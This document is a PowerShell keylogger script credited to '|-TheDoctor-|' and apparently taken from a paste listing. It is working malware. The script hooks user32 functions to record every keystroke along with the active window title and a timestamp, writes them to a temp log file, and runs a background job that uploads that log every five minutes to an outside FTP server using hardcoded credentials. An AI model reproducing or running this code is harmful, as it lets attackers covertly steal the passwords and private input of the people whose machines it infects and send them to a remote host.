Powershell Keylogger

1. <#
2.  
3. PowerShell keystroke logger
4.  
5. Pasted together by
6. |-TheDoctor-|
7.  
8. #>
9. function KeyLog {
10.  
11.     # MapVirtualKeyMapTypes
12.     # <summary>
13.     # uCode is a virtual-key code and is translated into a scan code.
14.     # If it is a virtual-key code that does not distinguish between left- and
15.     # right-hand keys, the left-hand scan code is returned.
16.     # If there is no translation, the function returns 0.
17.     # </summary>
18.     $MAPVK_VK_TO_VSC = 0x00
19.  
20.     # <summary>
21.     # uCode is a scan code and is translated into a virtual-key code that
22.     # does not distinguish between left- and right-hand keys. If there is no
23.     # translation, the function returns 0.
24.     # </summary>
25.     $MAPVK_VSC_TO_VK = 0x01
26.  
27.     # <summary>
28.     # uCode is a virtual-key code and is translated into an unshifted
29.     # character value in the low-order word of the return value. Dead keys (diacritics)
30.     # are indicated by setting the top bit of the return value. If there is no
31.     # translation, the function returns 0.
32.     # </summary>
33.     $MAPVK_VK_TO_CHAR = 0x02
34.  
35.     # <summary>
36.     # Windows NT/2000/XP: uCode is a scan code and is translated into a
37.     # virtual-key code that distinguishes between left- and right-hand keys. If
38.     # there is no translation, the function returns 0.
39.     # </summary>
40.     $MAPVK_VSC_TO_VK_EX = 0x03
41.  
42.     # <summary>
43.     # Not currently documented
44.     # </summary>
45.     $MAPVK_VK_TO_VSC_EX = 0x04
46.  
47.     $virtualkc_sig = @'
48. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
49. public static extern short GetAsyncKeyState(int virtualKeyCode);
50. '@
51.  
52.     $kbstate_sig = @'
53. [DllImport("user32.dll", CharSet=CharSet.Auto)]
54. public static extern int GetKeyboardState(byte[] keystate);
55. '@
56.  
57.     $mapchar_sig = @'
58. [DllImport("user32.dll", CharSet=CharSet.Auto)]
59. public static extern int MapVirtualKey(uint uCode, int uMapType);
60. '@
61.  
62.     $tounicode_sig = @'
63. [DllImport("user32.dll", CharSet=CharSet.Auto)]
64. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
65. '@
66.  
67.     $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
68.     $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
69.     $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
70.     $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
71.  
72.     try
73.             {
74.                 $ImportDll = [User32]
75.             }
76.             catch
77.             {
78.                 $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
79.                 $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
80.                 $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
81.                 $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')
82.  
83.                 $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
84.                 $FieldArray = [Reflection.FieldInfo[]] @(
85.                     [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
86.                     [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
87.                     [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
88.                     [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
89.                     [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
90.                     [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
91.                 )
92.  
93.                 $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
94.                 $FieldValueArray = [Object[]] @(
95.                     'GetAsyncKeyState',
96.                     $True,
97.                     $False,
98.                     $True,
99.                     [Runtime.InteropServices.CallingConvention]::Winapi,
100.                     [Runtime.InteropServices.CharSet]::Auto
101.                 )
102.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
103.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
104.  
105.                 $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
106.                 $FieldValueArray = [Object[]] @(
107.                     'GetKeyboardState',
108.                     $True,
109.                     $False,
110.                     $True,
111.                     [Runtime.InteropServices.CallingConvention]::Winapi,
112.                     [Runtime.InteropServices.CharSet]::Auto
113.                 )
114.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
115.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
116.  
117.                 $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
118.                 $FieldValueArray = [Object[]] @(
119.                     'MapVirtualKey',
120.                     $False,
121.                     $False,
122.                     $True,
123.                     [Runtime.InteropServices.CallingConvention]::Winapi,
124.                     [Runtime.InteropServices.CharSet]::Auto
125.                 )
126.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
127.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
128.  
129.                 $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
130.                     [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
131.                 $FieldValueArray = [Object[]] @(
132.                     'ToUnicode',
133.                     $False,
134.                     $False,
135.                     $True,
136.                     [Runtime.InteropServices.CallingConvention]::Winapi,
137.                     [Runtime.InteropServices.CharSet]::Auto
138.                 )
139.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
140.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
141.  
142.                 $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
143.                 $FieldValueArray = [Object[]] @(
144.                     'GetForegroundWindow',
145.                     $True,
146.                     $False,
147.                     $True,
148.                     [Runtime.InteropServices.CallingConvention]::Winapi,
149.                     [Runtime.InteropServices.CharSet]::Auto
150.                 )
151.                 $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
152.                 $PInvokeMethod.SetCustomAttribute($CustomAttribute)
153.  
154.                 $ImportDll = $TypeBuilder.CreateType()
155.             }
156.  
157.     while ($true) {
158.         Start-Sleep -Milliseconds 40
159.         $gotit = ""
160.  
161.         for ($char = 1; $char -le 254; $char++) {
162.             $vkey = $char
163.             $gotit = $getKeyState::GetAsyncKeyState($vkey)
164.  
165.             if ($gotit -eq -32767) {
166.  
167.                 $EnterKey = $getKeyState::GetAsyncKeyState(13)
168.                 $TabKey = $getKeyState::GetAsyncKeyState(9)
169.                 $DeleteKey = $getKeyState::GetAsyncKeyState(46)
170.                 $BackSpaceKey = $getKeyState::GetAsyncKeyState(8)
171.                 $LeftArrow = $getKeyState::GetAsyncKeyState(37)
172.                 $UpArrow = $getKeyState::GetAsyncKeyState(38)
173.                 $RightArrow = $getKeyState::GetAsyncKeyState(39)
174.                 $DownArrow = $getKeyState::GetAsyncKeyState(40)
175.  
176.                 $caps_lock = [console]::CapsLock
177.  
178.                 $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
179.  
180.                 $kbstate = New-Object Byte[] 256
181.                 $checkkbstate = $getKBState::GetKeyboardState($kbstate)
182.  
183.                 $TopWindow = $ImportDll::GetForegroundWindow()
184.                 $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
185.  
186.                 $LogOutput = "`"" + $WindowTitle + "`"`t`t`t"
187.  
188.                 $mychar = New-Object -TypeName "System.Text.StringBuilder";
189.                 $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
190.  
191.                 $LogOutput += $mychar.ToString();
192.                
193.                 if ($EnterKey)     {$LogOutput += '[ENTER]'}
194.                 if ($TabKey)       {$LogOutput += '[Tab]'}
195.                 if ($DeleteKey)    {$LogOutput += '[Delete]'}
196.                 if ($BackSpaceKey) {$LogOutput += '[Backspace]'}
197.                 if ($LeftArrow)    {$LogOutput += '[Left Arrow]'}
198.                 if ($RightArrow)   {$LogOutput += '[Right Arrow]'}
199.                 if ($UpArrow)      {$LogOutput += '[Up Arrow]'}
200.                 if ($DownArrow)    {$LogOutput += '[Down Arrow]'}
201.  
202.                 $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
203.                 $LogOutput += "`t`t`t`t`t" + $TimeStamp
204.                
205.                 if ($unicode_res -gt 0) {
206.                     $logfile = "$env:temp\key.log"
207.                     $LogOutput | Out-File -FilePath $logfile -Append
208.                 }
209.             }
210.         }
211.     }
212. }
213.  
214. Start-Job {
215.  
216.     # Config
217.     $Username = "russenzeug"
218.     $Password = "w0dk4f0rth34rmy"
219.     $LocalFile = "$env:temp\key.log"
220.     $RemoteFile = "ftp://russenzeug.bplaced.net/Logs/Log.txt"
221.     $SleepTime = 300
222.  
223.     while (1 -eq 1)
224.     {
225.         # Sleep for specified time
226.         Start-Sleep -Seconds $SleepTime
227.  
228.         # Create FTP Rquest Object
229.         $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile")
230.         $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest
231.         $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
232.         $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password)
233.         $FTPRequest.UseBinary = $true
234.         $FTPRequest.UsePassive = $true
235.  
236.         # Read the File for Upload
237.         $FileContent = gc -en byte $LocalFile
238.         $FTPRequest.ContentLength = $FileContent.Length
239.  
240.         # Get Stream Request by bytes
241.         $Run = $FTPRequest.GetRequestStream()
242.         $Run.Write($FileContent, 0, $FileContent.Length)
243.  
244.         # Cleanup
245.         $Run.Close()
246.         $Run.Dispose()
247.     }
248. }
249.  
250. KeyLog